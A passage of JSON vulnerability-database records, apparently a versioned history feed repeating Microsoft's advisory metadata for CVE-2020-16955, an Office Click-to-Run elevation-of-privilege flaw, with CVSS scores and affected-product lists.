privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-18T02:47:54", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-18T02:47:54", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-18T02:47:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T02:47:54", "differentElements": ["msAffectedSoftware"], "edition": 58}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-18T18:44:38", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-18T18:44:38", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-18T18:44:38", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-18T18:44:38", "differentElements": ["msAffectedSoftware"], "edition": 59}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-19T00:58:05", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-19T00:58:05", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-19T00:58:05", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:58:05", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-19T08:48:54", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-19T08:48:54", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-19T08:48:54", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:48:54", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-19T10:51:27", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-19T10:51:27", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-19T10:51:27", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T10:51:27", "differentElements": ["msAffectedSoftware"], "edition": 62}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "380c01a7f417ccb3418ade4faba49154", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-19T14:49:33", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-19T14:49:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-19T14:49:33", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T14:49:33", "differentElements": ["msAffectedSoftware"], "edition": 63}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-19T16:52:00", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-19T14:49:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-19T14:49:33", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T16:52:00", "differentElements": ["msAffectedSoftware"], "edition": 64}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-19T18:49:36", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-19T14:49:33", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-19T14:49:33", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", 